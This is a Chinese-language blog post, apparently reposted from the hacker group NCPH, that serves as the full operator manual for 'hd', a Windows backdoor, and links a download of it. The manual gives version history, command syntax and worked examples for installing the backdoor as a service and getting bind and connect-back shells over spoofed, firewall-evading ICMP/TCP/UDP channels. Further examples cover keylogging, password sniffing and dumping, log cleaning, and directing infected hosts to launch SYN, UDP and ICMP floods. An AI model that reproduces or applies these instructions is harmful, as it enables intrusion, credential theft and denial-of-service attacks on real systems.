hd

    [多云 July 10, 2008 09:24 | by !4p47hy ]
下载地址:http://www.ncph.net/soft/hd.rar
来源:NCPH

一. 后门主要模块介绍
==========================================================================================

1. 后门服务端
a. 后门功能
b. 后门管理
c. 文件目录操作
d. 执行程序操作
e. 系统操作
f. Shell功能
g. Proxy功能
h. DDoS功能
i. HBot功能
j. 附加功能

2. 后门客户端
a. 参数设置
b. 后门连接功能
c. 后门反连管理
d. 后门反连自动控制
e. 文件传输

3. 附加功能
a. 扫描器
b. 服务操作
c. 进程操作
d. 密码解码
e. 其他

二. 后门更新历史
==========================================================================================
2005–07-01 V1.0b5

1. 加入pulist功能。
2. 加入cleanlog功能。
3. 修正并改进了Sniffer模块。
SEQ设置成10101为不区分木马包的目标IP, 设置成10102为区分目标IP.
在装有此后门的机器上使用client功能连接其他机器时,如果使用icmp通讯。请把icmptype设成0 即 icmp_echoreply
否则会引起风暴。
4. 加入加密反连Shell功能,只能用后门的监听功能连接。
#5. 加入无连接Socks5功能。
#6. 添加了隐藏模块,能隐藏服务和进程。

2005-01-17 V1.0b4

1. 修正pwdump功能,Win2000下有效。
2. 加入clip命令查看剪切板信息。
3. 修复exe无效命令时出错问题。
4. ResultShell 支持交互模式。
5. 加入HBot模块,加入HASH和HBOT命令请看第六节详细介绍,命令行HBOT命令支持HBot测试。
6. 存储数据进行了简单加密。
7. 添加sqlcmd功能。
8. 改进了hbs端口扫描功能,为1.2版本。
9. 添加旧版hscan扫描功能,支持简单ping,name,sql,ipc扫描。

2005-01-03 V1.0b3

1. 添加了SU功能 — 实现管理员用户到任何用户权限的切换(终端下只能切换到SYSTEM)Thx bkbll。
2. 添加了自安装文件生成功能。命令为 hd -create [Newfile]
3. 修复了随机种子问题。
4. 修正GET/PUT文件传输中文件名解析问题。
5. 改进了反连Socks5与Listen连接的稳定性,修改代理转发核心超时设置为10分钟。
6. 修改了反连URL模块,支持Header数据操作和简单的Command识别。
7. 添加了PHP URL反连管理系统。

2004-12-24 V1.0b2

1. 添加hbs功能 — 命令行端口banner及HTTP版本扫描器,记录文件为hbs.txt。
2. 添加hmb功能 — 域名MX Banner查找器,记录文件为hmb.txt。
3. 添加pwdump功能。
4. 添加无连接文件传输模块。在客户端shell模式里命令为SAFEGET/SAFEPUT。
5. 添加 ! 命令于Client模块,在不退出client和不新开cmd窗口的情况下执行本地命令。
6. 改进update功能,可以自动识别原来服务的文件路径并安装。
7. 反连管理模块加入log功能,记录文件为hc.txt。
8. 修复client命令行功能TargetIP指定出错问题。 thx fatb。
9. 改进了GET/PUT文件传输。
10. 修改了后门Shell命令分类和帮助。
11. 重新编写了Readme和整理了在线帮助信息。

2004-12-15 V1.0b1

1. 修正Sniffer模块取得执行结果时无法按设定的通讯方式返回数据的低级错误,thx fatb。
2. 修正getresult功能中执行命令回显超时问题。
3. 修正Htran功能为2.30版本,支持反连和端口重用Socks5。
4. 修正pskill功能出错问题。
5. 完善proxy任务控制中的socket和线程处理。

2004-11-16 V1.0b

1. 添加URL后门模块。URL支持批处理Door Shell命令。thx bkbll。
2. 修改了后门模式,支持同时进行 bind,connectback,downloadurl任务。

2004-11-09 V0.84

1. 修改了反连后门控制功能,添加自动脚本,自动保持连接,关注IP或者后门ID等功能。
2. 添加了Send Mail 功能,thx bkbll。
3. 支持切换shell,使用return从shell中返回主界面。
4. 反连后门控制功能模块自动监听53端口。

2004-09-02 V0.83

1. 添加VNC密码解码。
2. 添加MSN密码解码。
3. 添加Enum+的功能。
4. 添加列举网络机器的功能。

2004-06-20 V0.81

1. 增加简单的后门反连控制模块在客户端功能里。
2. 修补Sniffer模块在执行命令时会造成模块僵死问题。
3. 客户端内置命令有改动。

2004-06-18 V0.80 ( 最终版???)

1. 增加Bind Server功能。
2. 完善在线shell控制功能。
3. 实现随机加密。
4. 修复Bind Shell/ConnectBack Shell 里的监听,验证密码和接受数据时的超时问题。
5. 修复kick Shell僵死问题。
6. 重写服务功能代码。

2004-06-14 V0.72 (测试版)

1. 修改了client模块 getresult/getsafe 参数判断问题。

2004-06-10 V0.71

1. 重新加入安全删除功能。
2. 加入kick Shell功能。

2004-06-07 V0.70 (无连接加密通讯版)

1. 更新客户端功能和木马协议。
2. 实现加密和hash验证。
3. 实现加密无连接CMD Shell和BackDoor Shell功能。
4. 完善后门升级功能。
5. 修改client功能,与0.60版及以下版本不兼容。
6. 客户端getresult功能里不能使用交互式命令操作(如client, cmd等)。如果要使用请用getsafe
模式。

2004-05-25 V0.60 (初步完善版)

1. 添加Sniffer密码功能。
2. 添加显示日期功能。
3. 添加抓屏功能。
4. 添加find查找文件功能。
5. 添加findpass功能。
6. 添加在线shell列表功能。
7. 后门中融合Client功能。
8. 改进Shell里执行功能的调用方式。
9. 修复多层连接时传输文件出错问题。

2004-05-21 V0.52

1. 添加文件传输功能。
2. 修复Fport功能出错问题。
3. 修改后门升级功能。

2004-05-16 V0.51

1. 添加终端安装修改端口功能。
2. 添加Pcanywhere密码文件解码功能。
3. 添加keylog功能。
4. 添加后门配置功能。
5. 添加后门升级功能。

2004-05-09 V0.50  (V0.42 二次开发版)

1. 添加Socks5代理和反向Socks5代理功能。
2. 添加随服务启动的Socks5代理和拒绝服务攻击任务功能。
3. 添加了exe功能在没有cmd.exe的时候获得执行功能并取得结果。
4. 重写后门核心模块。
5. 重写Client代码。
6. 重写Sniffer解码功能。
7. 重写后门其他很多功能代码。
8. 修改了木马协议。
9. 修改了代理和拒绝服务任务控制功能。
10. …..

2002-??-?? V0.42  (私人专用版)

1. 加强Sniffer解码功能,能捕获TCP/UDP/ICMP。
2. 封装简单木马协议,能接受shell命令。
3. 专用Client。

2002-??-?? V0.41 (2002年公开发布版)

1. 功能请看原版。

三. 命令行使用方法介绍
==========================================================================================

1. 查看帮助

使用命令: hd -help / hd -h
帮助信息:
[Usage of Backdoor:]
-create         Create AutoRun file
-install        Install Service
-remove         Remove Service
-start          Start Service
-stop           Stop Service
-update         Update Service

[Usage of Function:]
-b              Backdoor Client
-c              Config Parameter
-d              DDoS Attack
-f              Port Banner Scanner
-g              Ping/Name/SQL/IPC Scanner
-h              Help Info
-m              Command Line SendMail
-o              Show Other Function
-p              Packet Transmit
-s              Socks5 Proxy
-u              Like UNIX su Tool
-x              Sniffer

2. 后门操作

a. 后门安装

使用命令: hd -install

b. 后门启动

使用命令: hd -start

c. 停止后门

使用命令: hd -stop

d. 删除后门

使用命令: hd -remove

e. 更新后门

使用命令: hd -update [Reinstall]
参数解释:
1. 默认将自动识别原来的安装文件路径进行覆盖安装。
2. 如果选择reinstall将删除原来的服务和配置信息。
3. 如果没安装服务将自动用此路径安装服务并运行。

f. 生成自运行文件

使用命令: hd -create [Newfile]
参数解释:
1. 默认将自动识别运行的文件名后添加 _new 作为生成文件的名称。
2. Newfile为指定生成的文件名。
3. 最好压缩后再生成。
使用示例:
D:\>hd -create
Usage of Create AutoRun File: -create [Newfile]

Enter your Door Type <1.ConnectBack  2.DownloadURL 3.HBot>: 1

Enter your ConnectBack Host : 10.10.10.222

Enter your ConnectBack Port <1-65535>: 53

Enter your Sleep Time : 60

Add Your Config Info in to The File Success.
Please use “HD_new.exe”.

3. 后门客户端功能

使用命令: hd -client | hd -b

a. 客户端使用帮助

使用命令: hd -b -h
帮助信息:
[Usage of Door Client:]
-b [Sniffer BindIP]
-b [Option]

[Command:]
Please See the BackDoor Shell Help Message!
[Option:]
-i:SEQ         Set the BackDoor IP Packet SEQ. Default is 10101.
-l:SourcePort  Use for TCP/UDP Send Mode. Default is 53.
-m:SendMode    Set the TCP/UDP/ICMP Send Packet Mode. Default is ICMP.
-p:TargetPort  Use for TCP/UDP Send Mode. Default is 80.
-s:SourceIP    Set the Source IP. Default is your Real IP.
-t:ICMPType    Set the ICMP Type. Default is 8(ICMP_ECHO).
[Example:]
-b 192.168.0.1 “bind 99″
-b 192.168.0.1 “bind 99″ -m:tcp -l:1025 -p:80 -s:192.168.0.2
-b 192.168.0.1 “connect 192.168.0.2 53″
-b hosts.txt   “hgod 192.168.0.2 80″

b. 客户端命令行使用模式(在不必要或者不能交互的情况下使用)

使用命令: hd -b [Option]
参数解释:
1. 为支持IP和IP列表文件两种发送形式,以实现批量处理工作。
2. 为发送的命令,可为后门内置Shell里的任意一个命令及其参数。具体请查看后门Shell帮助信息。
3. SEQ 为后门协议特征包的标识,参数默认为10101,如要后门区分收到的数据包的目的IP是否为本地IP,用10102。
4. SourcePort 为发送数据包的源端口,参数为1-65535的有效端口。选为目标允许通讯的源端口可有效突破防火墙。
5. SendMode 为发送数据包的方式,参数为 TCP/UDP/ICMP 中的任一个。选为目标允许通过的协议可有效突破防火墙。
6. TargetPort 为发送数据包的目的端口,参数为1-65535的有效端口。选为目标开放的端口可有效突破防火墙。
7. SourceIP 为发送数据包的源IP,可伪造为任何IP以掩盖发送数据包的真实IP,如选为目标的可信IP可有效突破防火墙。
注:使用虚假源IP时,将视发包机器所在的网络设置,对方将可能收不到数据包。
8. ICMPType 为发送数据包的方式为ICMP时的可选项,可为任何ICMP数据包类型,选为目标允许通过的ICMP包可有效突破防火墙。
使用示例:
1. 如果要192.168.0.1机器上的后门监听99端口,发包的方式为TCP,目标开放的端口为80,用如下命令:
hd -b 192.168.0.1 “bind 99″ -m:tcp -p:80
2. 如果要让hosts.txt里记录的已经装好后门的机器对192.168.0.1发起SYN拒绝服务攻击,用如下命令:
hd -b hosts.txt “hgod 192.168.0.1 80″

c. 客户端shell模式

使用命令: hd -b [Sniffer BindIP]
参数解释:
1. 多网卡的机器上使用客户端功能时可能需要指定Sniffer绑定的IP,以便Sniffer能正常工作和通讯。
2. 如果不指定IP将自动获取本机的第一个IP作为绑定IP。

d. 客户端shell模式内置命令介绍(按命令次序详细介绍)

使用命令: hd -b [Sniffer BindIP] 进入客户端shell模式。

1. ?

命令解释: 查看帮助信息
帮助信息:

?                  Shell Help
!                  Run a Local Command
A/AUTO             List and Add Auto Control
B/BIND             Bind and Listen a port
C/CLEAN            Clean the Shell log
D/DEL              Delete Auto Control
E/EXCHANGE         Exchange Mode to Shell/SafeShell/ResultShell
G/GO               Do Your Shell Command
H/HELP             Client Command Line Usage Help
K/KICK             Kick the Client
L/LIST             List Shell History
M/LISTEN           Listen for ConnectBack Shell
Q/QUIT             Exit This Program
R/RESET            Reset the Parameter of Packet to Default Value
S/SET              Set the Setting
T/TELNET           Telnet to Other Host
U/TEST             Test Target
W/WHO              Who is Connected

GB/GETBIND         Get the Target Bind Shell
GC/GETCONNECT      Get the Target Connect Back Shell
GS/GETSAFE         Get the Target Safe Shell
GR/GETRESULT       Get the Target Result Shell
GL/GETLISTEN       Get the Listen Shell
SG/SAFEGET         Safe Get File From Target
SP/SAFEPUT         Safe Put File to Target

2. !

命令解释: 运行本地命令
帮助信息:
Usage of Run Command: !
参数解释:
1.
2. 可以在不开新cmd窗口和退出client交互模式的情况下运行本地命令。
使用示例:
1. 如果要列表D盘根目录的文件,用如下命令:
!dir d:\

3. A/AUTO

命令解释: 列举和添加连接自动控制
帮助信息:
Usage of Add Auto: a
参数解释:
1. 如果不用参数将列举出当前的控制记录。
2.  为该控制记录规则适用的IP或者后门ID。
3. 规则的具体内容为set命令里设置的 [a]-[f]条目。

[a] AutoLogin    =  true      // 是否自动登陆后门,默认为登陆
[b] AutoKeep     =  true      // 自动保持连接活动,默认为保持
[c] DoorScript   =  false     // 自动对后门发送脚本,默认为不发送
[d] KeepCommand  =  cd \      // 自动保持连接发送的命令,默认为”cd \”
[e] Script       =            // 自动发送脚本文件路径,默认为空
[f] LogConnect   =  true      // 记录连接信息,默认为记录

注:
a. 后门反连控制可以用于后门的反向连接和溢出的CMDShell的反向连接。
b. 如果Script设为有效的文件,将对所有的CMDShell连接起作用。
c. 如果Script设为有效的文件,同时DoorScript设为真,将对所有的后门反向连接和CMDShell连接起作用。
d. Script文件的内容为若干行命令。每个命令占用一行。
如果要对CMDShell适用的话请用cmd下能用的命令编写。
如果要对DoorShell适用的话可以用任意DoorShell支持的命令编写。
如果要同时都适用的话,请用cmd下能用的命令编写,并在文件的开头加上一个cmd和在文件的结尾加多一个exit。
e. set命令里的全局设置将对不在自动控制条目里的所有连接有效。set命令使用帮助在下面。
f. 该功能主要用于批量溢出的自动控制。
g. AutoKeep为保活连接,在不支持长连接的网络环境下使用或者防止后门反连后因超时退出(默认超时为10分钟)。
如果对DoorShell进行保活连接操作,必须把AutoLogin打开。

使用示例:
1. 如果让所有的CMD Shell连接发送httpget.txt里的脚本,用如下命令:
set script = httpget.txt
2. 如果让所有后门ID为HUC的DoorShell自动执行ddos.txt里的脚本,用如下命令:
set script = ddos.txt
set doorscript = true
auto huc
3. 如果让IP为192.168.0.1的DoorShell反连后自动保持连接,并发送命令”noop”,用如下命令:
set autologin = true
set autokeep = true
set keepcommand = noop
auto 192.168.0.1

4. B/BIND

命令解释: 监听一个端口
帮助信息:
Usage of Bind Port: b
参数解释:
1. 参数为1-65535的有效端口。
2. 该功能主要用于代替nc -l -vv -p

5. C/CLEAN

命令解释: 清除本地Shell日志

6. D/DEL

命令解释: 删除自动控制条目
帮助信息:
Usage of Delete Auto: d
参数解释:
1. 为用Auto命令列举出所有自动控制条目中的那个ID条目编号。
2. 为清除所有的自动控制条目。

7. E/EXCHANGE

命令解释: 切换Shell环境
使用帮助:
1. 当设置了targetip以后,可以用这个在后门客户端Shell/ targetip的SafeShell/ targetip的ResultShell进行切换。
2. safeshell为无连接的cmd shell,第一次在目标使用safeshell时要先输入cmd,以便后门运行一个cmd来执行命令。
同时不使用safeshell时应用exit退出。
3. resultshell为无连接的door shell。

8. G/GO

命令解释: 发送数据包
使用帮助:
1. 当设置了targetip和command以后,就可以对目标用此命令发送数据包。
2. 如果需要可以设置其他参数,参数的范围为[0]-[9]。set命令使用帮助在下面。
3. 程序设置了不能重复发送两次g命令。如果要重复发送,请随便运行一个本地Shell命令再使用g命令。

9. H/HELP

命令解释: 显示Client功能命令行使用的帮助
帮助信息:
Use “\?” for Shell Help

[Usage of Door Client:]
-b [Sniffer BindIP]
-b [Option]

[Command:]
Please See the BackDoor Shell Help Message!
[Option:]
-i:SEQ         Set the BackDoor IP Packet SEQ. Default is 10101.
-l:SourcePort  Use for TCP/UDP Send Mode. Default is 53.
-m:SendMode    Set the TCP/UDP/ICMP Send Packet Mode. Default is ICMP.
-p:TargetPort  Use for TCP/UDP Send Mode. Default is 80.
-s:SourceIP    Set the Source IP. Default is your Real IP.
-t:ICMPType    Set the ICMP Type. Default is 8(ICMP_ECHO).
[Example:]
-b 192.168.0.1 “bind 99″
-b 192.168.0.1 “bind 99″ -m:tcp -l:1025 -p:80 -s:192.168.0.2
-b 192.168.0.1 “connect 192.168.0.2 53″
-b hosts.txt   “hgod 192.168.0.2 80″

10. K/KICK

命令解释: 踢掉反连Shell
帮助信息:
Usage of Kick Shell: k
参数解释:
1. 为用W/WHO命令列举出所有Shell条目中的那个ID条目编号。
2. 为踢掉所有的反连Shell。
3. 为踢掉所有的Shell条目。

11. L/LIST

命令解释: 列举最近运行的80个Shell命令。

12. M/LISTEN

命令解释: 在指定端口监听后门反连
帮助信息:
Usage of Listen for ConnectBack: m
参数解释:
1. 参数为1-65535的有效端口。
2. 程序自动设置Rebind参数,重绑定该端口。
3. 该功能用于反连控制模块。
4. Set命令的[a]-[f]条目适用此端口的连接。

13. Q/QUIT

命令解释: 退出客户端Shell模式

14. R/RESET

命令解释: 重置全局参数为初始值

15. S/SET

命令解释: 设置全局参数
帮助信息:
List Setting:
编号|参数名|        |默认/当前值|
============================================
No  Parameter    Op Value
[0] TargetIP     =
[1] SourceIP     =
[2] TargetPort   =  80
[3] SourcePort   =  53
[4] Command      =
[5] Seq          =  10101
[6] SendMode     =  ICMP
[7] ICMPType     =  8
[8] GetResult    =  false
[9] Hostlist     =

[a] AutoLogin    =  true
[b] AutoKeep     =  true
[c] DoorScript   =  false
[d] KeepCommand  =  cd \
[e] Script       =
[f] LogConnect   =  true

Use “Set Parameter Op Value” or “Set No Op Value” for Set the Parameter.
Example:
Use “Set targetip to 192.168.7.1″ for set the targetip, etc.
Use “Set 0 = 192.168.7.1″ for set the targetip, etc.
参数解释:
1. TargetIP 要发送数据包的目的IP。
2. SourceIP 为发送数据包的源IP。可伪造为任何IP以掩盖发送数据包的真实IP,如选为目标的可信IP可有效突破防火墙。
注:使用虚假源IP时,将视发包机器所在的网络设置,对方将可能收不到数据包。
3. TargetPort 为发送数据包的目的端口。参数为1-65535的有效端口。选为目标开放的端口可有效突破防火墙。
4. SourcePort 为发送数据包的源端口,参数为1-65535的有效端口。选为目标允许通讯的源端口可有效突破防火墙。
5. Command 为后门Shell支持的任何一个命令及其参数。具体请查看后门Shell帮助信息。
6. Seq 为后门协议特征包的标识,参数默认为10101,如要后门区分收到的数据包的目的IP是否为本地IP,用10102。
7. SendMode 为发送数据包的方式,参数为 TCP/UDP/ICMP 中的任一个。选为目标允许通过的协议可有效突破防火墙。
8. ICMPType 为发送数据包的方式为ICMP时的可选项,可为任何ICMP数据包类型,选为目标允许通过的ICMP包可有效突破防火墙。
9. GetResult 为发送命令后是否要取得执行结果。
10. hostlist 指定为IP列表文件的路径。为支持IP列表文件发送形式,以实现批量处理工作。
11. AutoLogin 为是否自动登陆后门。
12. AutoKeep 为是否自动保持连接活动。
13. DoorScript 为是否自动对后门发送脚本。
14. KeepCommand 为是否自动保持连接发送的命令。
15. Script 为是否自动发送脚本文件路径。
16. LogConnect 为是否记录连接信息。
使用示例:
1. 无参数的S/SET命令将显示当前的全局设置。
2. set设置参数形式为: set 参数 Operate 值 或 set 参数ID Operate 值
3. 如设置目标IP为192.168.0.1可用 set targetip = 192.168.0.1 或 set 0 = 192.168.0.1
4. 设置SendMode为TCP用: set sendmode = tcp 或 set 6 = tcp
5. 设置Command为bind 99用: set command = bind 99 或 set 4 = bind 99 或 set 4 = “bind 99″
6. 设置Autologin为假用: set autologin = false 或 set a = false

16. T/TELNET

命令解释: 连接端口
帮助信息:
Usage of Telnet: t
参数解释:
1.  参数为要连接的IP 。
2. 参数为1-65535的有效端口。
3. 该功能主要用于代替nc
17. U/TEST

命令解释: 测试对目标的权限
帮助信息:
Usage of Testing: u
参数解释:
1.  参数为要连接的IP 。
2. 如果对方安装了后门,且密码正确的话将返回成功的信息。
3. 发包的参数如SendMode,TargetPort等可以用Set进行设置。
18. W/WHO

命令解释: 列出当前所有反连的用户和所有监听反连的端口

19. GB/GETBIND

命令解释: 获取对方的Bind Shell(监听Shell)
帮助信息:
Usage of GetBindShell: gb
参数解释:
1. 为要获取Shell的目标IP。
2. 为目标要监听的端口。
3. 发包的参数如SendMode,TargetPort等可以用Set进行设置。

20. GC/GETCONNECT

命令解释: 获取对方的ConnectBack Shell(反连Shell)
帮助信息:
Usage of GetConnectBackShell: gc [BonnectBackIP]
参数解释:
1. 为要获取Shell的目标IP。
2. 为目标要反连的端口。
3. [BonnectBackIP] 为目标要反连的IP。默认为本机的IP。
4. 发包的参数如SendMode,TargetPort等可以用Set进行设置。
5. 如果反连的IP为本地将自动监听一个端口,如果反连的端口为53,将自动用53的反连控制来控制。

21. GS/GETSAFE

命令解释: 获取对方的无连接加密CMD Shell
帮助信息:
Usage of GetSafeShell: gs
参数解释:
1. 为要获取Shell的目标IP。
2. 发包的参数如SendMode,TargetPort等可以用Set进行设置。
3. 通过正确设置参数可以突破大多数防火墙。

22. GR/GETRESULT

命令解释: 获取对方的无连接加密Door Shell
帮助信息:
Usage of GetResultShell: gr
参数解释:
1. 为要获取Shell的目标IP。
2. 发包的参数如SendMode,TargetPort等可以用Set进行设置。
3. 通过正确设置参数可以突破大多数防火墙。

23. GL/GETLISTEN

命令解释: 获取监听中的反连Shell
帮助信息:
Usage of GetListen: gl
参数解释:
1. 为W/WHO命令列出的反连Shell的ID编号。
2. gl某一个shell以后,可以用return命令返回到客户端的交互Shell中。

24. SG/SAFEGET

命令解释: 无连接文件下载
帮助信息:
Usage: sg
参数解释:
1. 为要获取文件的目标IP。
2. 为要获取的远程文件路径。
3. 为本地要保存的文件路径。
4. 发包的参数如SendMode,TargetPort等可以用Set进行设置。
5. 通过正确设置参数可以突破大多数防火墙。

25. SP/SAFEPUT

命令解释: 无连接文件上传
帮助信息:
Usage: sp
参数解释:
1. 为要上传文件的目标IP。
2. 为要保存的远程文件路径。
3. 为上传的本地文件路径。
4. 发包的参数如SendMode,TargetPort等可以用Set进行设置。
5. 通过正确设置参数可以突破大多数防火墙。

4. 后门配置功能

使用命令: hd -config | hd -c
使用帮助:
[Usage of Config:]
-c -show
-c -type      <0,1,2,3,4>
-c -id        
-c -port      
-c -url       [SleepTime]
-c -cb         [SleepTime]
-c -hbot       [ChannelPass]
-c -time      
-c -ip        
-c -log      
-c -ddostype  <0,1,2,3,4>
-c -ddos      
-c -sockstype <0,1,2,3>
-c -bind      [ReBindIP]
-c -connect  
-c -listen    
————————————————–
DoorType:       0.Disable 1.BindPort 2.ConnectBack 3.DownloadURL 4.HBot
DDoSType:       0.Disable 1.SYN      2.UDP         3.ICMP        4.IGMP
SocksType:      0.Disable 1.Bind     2.Connect     3.Listen

参数解释:
a. hd -c -show

命令解释: 查看当前配置信息

b. hd -c -type       <0,1,2,3>

命令解释: 设置当前的后门任务模式
参数解释:
1. DoorType: 0.Disable 1.BindPort 2.ConnectBack 3.DownloadURL 4.HBbot
后门类型为: 0为无任务,1为监听端口,2为反连,3为自动下载URL文件并执行其中的命令,4为HBot模块。
2. 四个后门任务可同时工作。即同时有反连,监听端口,URL模块和HBot模块。

c. hd -c -id

命令解释: 设置后门的ID
参数解释:
1. 为后门的ID名称,小于16个字符。
2. DoorID 作用为区别后门,并可用于后门反连控制的自动控制条目中。

d. hd -c -port

命令解释: 设置后门的工作形式为监听端口
参数解释:
1. 为要设置的监听端口
2. 监听端口允许多次客户端的连接。

e. hd -c -url [SleepTime]

命令解释: 配置后门的工作形式为自动下载URL并执行其中的命令
参数解释:
1. 为要下载的URL文件路径,可带端口。文件内容可为多行Door Shell命令组成。
2. [SleepTime] 为下载一次的间隔时间,默认为60分钟,单位为分钟。

f. hd -c -cb         [SleepTime]

命令解释: 设置后门的工作形式为反连
参数解释:
1. 为反连的IP或者域名。
2. 为反连的端口,参数为1-65535的有效端口,细心设置可突破一般防火墙策略。
3. [SleepTime] 为反连一次的间隔时间,默认为60分钟,单位为分钟。

g. hd -c -time

命令解释: 设置后门的间隔时间
参数解释:
1. 为后门反连或者下载URL的间隔时间,单位为分钟。

h. hd -c -ip

命令解释: 设置后门Sniffer绑定的IP
参数解释:
1. 为机器的其中一个IP。不能使用127.0.0.1和0.0.0.0。
2. 此功能在机器有多个网卡的情况下使用。使Sniffer模块在外网的接口绑定才能保证后门的正常工作。
3. 默认为绑定机器的第一个IP。

i. hd -c -log      

命令解释: 设置后门日志记录文件
参数解释:
1. 为要保存的文件路径。
2. 默认记录文件为 hdsys.dat

j. hd -c -ddostype  <0,1,2,3,4>

命令解释: 设置后门拒绝服务攻击方式
参数解释:
1. DDoSType:       0.Disable 1.SYN      2.UDP         3.ICMP        4.IGMP
攻击类型为: 0. 无攻击任务 1. SYNFlood攻击 2. UDPFlood攻击 3. ICMPFlood攻击 4. IGMPFlood攻击
2. 只支持一个攻击任务,即为最后一次设置的攻击类型生效。
3. 更多拒绝服务使用帮助请看拒绝服务功能相关介绍。

k. hd -c -ddos      

命令解释: 设置后门绝服务攻击参数
参数解释:
1. 为要攻击的目标IP或域名。
2. 为要攻击的目标端口
3. 为攻击的线程。每个线程发包数为 <1000/秒 左右,自己根据网络状况设置。
4. 设置完后请用hd -c -ddostype 设置攻击的类型,以便攻击任务生效。
5. 如果攻击类型为ICMPFlood或者IGMPFlood时,端口可以任意设置。

l. hd -c -sockstype <0,1,2,3>

命令解释: 设置后门代理服务的方式
参数解释:
1. SocksType:      0.Disable 1.Bind     2.Connect     3.Listen
代理类型为: 0. 无代理任务 1. 监听端口代理 2. 反连代理 3.转发代理
2. 只支持一个代理任务,即为最后一次设置的代理类型生效。
3. 更多代理服务使用帮助请看代理功能相关介绍。

m. hd -c -bind      [ReBindIP]

命令解释: 设置后门代理服务为监听端口形式
参数解释:
1. [ReBindIP] 为设置为重用端口模式绑定的IP。不能为127.0.0.1。
2. 为代理监听的端口。

n. hd -c -connect  

命令解释: 设置后门代理服务为反连形式
参数解释:
1. 为要反连的IP。
2. 为要反连的端口。
3. 反连代理需要使用转发代理来接受反连才能正常工作。具体请看代理功能相关介绍。

o. hd -c -listen    

命令解释: 设置后门代理服务为转发形式
参数解释:
1. 供反连代理连接的端口。
2. 供SocksCap之类的代理客户端连接的端口。
3. 转发代理需要有反连代理连接才能正常工作。具体请看代理功能相关介绍。

5. 拒绝服务工具

使用命令: hd -d
帮助信息:
[Usage of DDoS Attack:]
-d [Option]
       Flooding Host IP|Hostname.
    Flooding Host Port. Port Num must <10.

[Option:]
-a:AttackTime  The Time(minute) of Attack. Set 0 for Always. Default is 0.
-b:Packsize    The Size of Packet, for UDP/ICMP/IGMP Mode. Default is 1000.
Set 0 to Random.
-d:Delay       Delay of Send Packet, for UDP/ICMP/IGMP Mode. Default is 10ms.
-m:Mode        Attack Mode, Use SYN/UDP/ICMP/IGMP. Default is SYN.
-p:SourcePort  Set SourcePort, Default is Random.
-s:SourceIP    Set SourceIP, Default is Random.
-t:Thread      The Threads Num for Flooding, Max is 100, Default is 5.
参数解释:
a. 为要攻击的目标IP或者域名。
b. 为要攻击的目标端口,用”,”号分隔,数量不要多于10个。
c. 为将攻击的时间,单位为分钟。设为0为一直攻击,默认为0。
d. 为发送数据包的大小,攻击模式为UDP/ICMP/IGMP时有效,默认为1000,设为0为随机大小。
e. 为每次发包的间隔延时,攻击模式为UDP/ICMP/IGMP时有效,单位为毫秒,默认10毫秒。
f. 为攻击的模式,有SYN/UDP/ICMP/IGMP四种攻击模式,默认为SYN Flood。
g. 为发包的源端口,SYN/UDP攻击模式有效。不推荐设置。
h. 为发包的源IP,所有攻击模式有效。不推荐设置。
i. 为攻击的线程,默认为5,最大线程为100。视网络状态设定。
j. DrDos 模式已经移除,不再支持。

使用示例:
a. 对192.168.0.1的21和80端口进行SYN攻击,使用命令为:
hd -ddos 192.168.0.1 21,80
b. 对www.xxx.com的80端口进行SYN攻击,线程为20,使用的命令为:
hd -ddos www.xxx.com 80 -t:20
c. 对192.168.0.1的4000端口进行UDP攻击,命令为:
hd -ddos 192.168.0.1 4000 /m:udp

6. 端口banner扫描器

使用命令: hd -f
帮助信息:
[Usage:]
-hbs [Options]

[Options:]
/b             Get Banner for many ports scan
/c             Check Web Version
/n             Note Port Open
/o             Scan Port Only
/w             Scan Web Version Only
/d      TCP connect timeout, between 1-20, default is 5
/l    Log file name, default is hbs.txt
/m [Ports]     Scan many ports, default will scan 35 ports
/p       Scan port, default is 25
/s     Scan sensitive string
/t     Scan thread number, between 1-1000, default is 200
参数解释:
a. 为要扫描的IP地址或主机名,如果要扫描一段IP地址,格式为 开始IP-结束IP。
b. /b 为多端口扫描时获取banner。
c. /c 为扫描后检查Web版本信息。
d. /n 为当目标的端口打开时,在扫描记录文件里记录此IP等信息。
e. /o 为只扫描开放的端口,不取Banner。
f. /w 为只扫描Web版本信息。
g. /d 为建立的TCP连接的延时,范围为1-20秒,默认为5秒。
h. /l 为记录扫描结果信息的日志文件。默认为hbs.txt。
i. /m [Ports] 为多端口扫描,默认为扫描内置常用的35个端口。
j. /p 为要扫描的端口,默认为25。
k. /s 为扫描时记录Banner包含该字符串的IP。大小写敏感。
l. /t 为扫描的线程,范围为1-1000,默认为200。建议ADSL用户设到100以下。
使用示例:
a. 如要扫描192.168.0.1-192.168.0.254这个段的25端口,用如下命令:
hd -hbs 192.168.0.1-192.168.0.254
b. 如果扫描192.168.0.1这个IP的25端口,扫描后检查Web版本信息,用如下命令:
hd -hbs 192.168.0.1 /c
c. 如果扫描192.168.0.1-192.168.0.254这个段的21端口,记录包含”Serv-U”的IP到servu.txt文件,用如下命令:
hd -hbs 192.168.0.1-192.168.0.254 /p 21 /s “Serv-U” /l servu.txt
d. 如果扫描192.168.0.1-192.168.0.254这个段的3389端口,用如下命令:
hd -hbs 192.168.0.1-192.168.0.254 /p 3389 /o
e. 如果扫描192.168.0.1-192.168.0.254这个段的80的Banner,用如下命令:
hd -hbs 192.168.0.1-192.168.0.254 /w
f. 如果要扫描www.n0p.org的常用端口并获取Banner,用如下命令:
hd -hbs www.n0p.org /m /b
g. 如果要扫描www.n0.org的多个端口,用如下命令:
hd -hbs www.n0p.org /m 21,23,25,80-5000,8080
即端口用”,”号分隔,端口范围用”-”号分隔。

7. 命令行Ping/Name/SQL/IPC扫描器

使用命令: hd -g
帮助信息:
[Usage:]
-hscan [Options]

[Options:]
/a             Scan All, default on
/c             Check host state, Ping first
/f             Faster Scan
/i             IPC User Scan
/n             Name Scan
/p             Ping Scan
/s             SQL User Scan
/d      Set timeout, between 1-20, default is 5
/l    Log file name, default is hscan.txt
/t     Scan thread number, between 1-1000, default is 200

参数解释:
a. 为要扫描的IP地址或主机名,如果要扫描一段IP地址,格式为 开始IP-结束IP。
b. /a 为扫描所有项目,默认打开。
c. /c 为先ping再扫描。
d. /f 为快速扫描(只猜空密码和与用户名有关的密码)。
e. /i 进行IPC扫描。
f. /n 进行Name扫描。
g. /p 进行Ping扫描。
h. /s 进行SQL扫描。
i. /d 为建立的TCP连接的延时,范围为1-20秒,默认为5秒。
j. /l 为记录扫描结果信息的日志文件。默认为hbs.txt。
k. /t 为扫描的线程,范围为1-1000,默认为200。建议ADSL用户设到100以下。

使用示例:
a. 如要要扫描192.168.0.1的所有项目,用如下命令:
hd -hscan 192.168.0.1
